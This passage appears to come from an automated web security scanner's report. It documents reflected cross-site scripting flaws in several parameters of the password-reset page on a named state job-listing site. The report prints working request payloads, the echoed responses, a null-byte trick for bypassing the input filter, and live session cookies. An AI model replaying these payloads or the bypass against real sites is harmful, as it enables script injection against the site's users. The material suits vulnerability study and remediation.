This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=190249ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="340991,190249ec8"style="x:expression(alert(1))"4a6109f7622c7b188" />
...[SNIP]...

3.147. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93e5"><a>3041bdbfc36 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991c93e5"><a>3041bdbfc36 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 611

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formnam
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;securitysys=on&amp;formid=47&amp;rand=340991c93e5"><a>3041bdbfc36&amp;choice=1">
...[SNIP]...

3.148. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0050736"><a>f99e3e72883 was submitted in the rand parameter. This input was echoed as 50736"><a>f99e3e72883 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902%0050736"><a>f99e3e72883 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=10&amp;rand=344110%0050736"><a>f99e3e72883&amp;choice=1">
...[SNIP]...

3.149. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728 was submitted in the securitysys parameter. This input was echoed as 742ad"style="x:expression(alert(1))"4cd993a311c127728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="SECURITYSYS_prev" value="on,on,on742ad"style="x:expression(alert(1))"4cd993a311c127728" />
...[SNIP]...

3.150. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad65"><a>dc07e9b7fc6 was submitted in the securitysys parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&FormID=10&rand=1902 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&amp;formid=10&amp;rand=579601&amp;choice=1">
...[SNIP]...

3.151. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [submit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4 was submitted in the submit parameter. This input was echoed as 5c951"style="x:expression(alert(1))"e4006df13c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:24'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="submit_error" value="Continue5c951"style="x:expression(alert(1))"e4006df13c4" class="cfTransparent" />
...[SNIP]...

3.152. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the usvuserid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318 was submitted in the usvuserid parameter. This input was echoed as 478b6"style="x:expression(alert(1))"8a8c443b318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
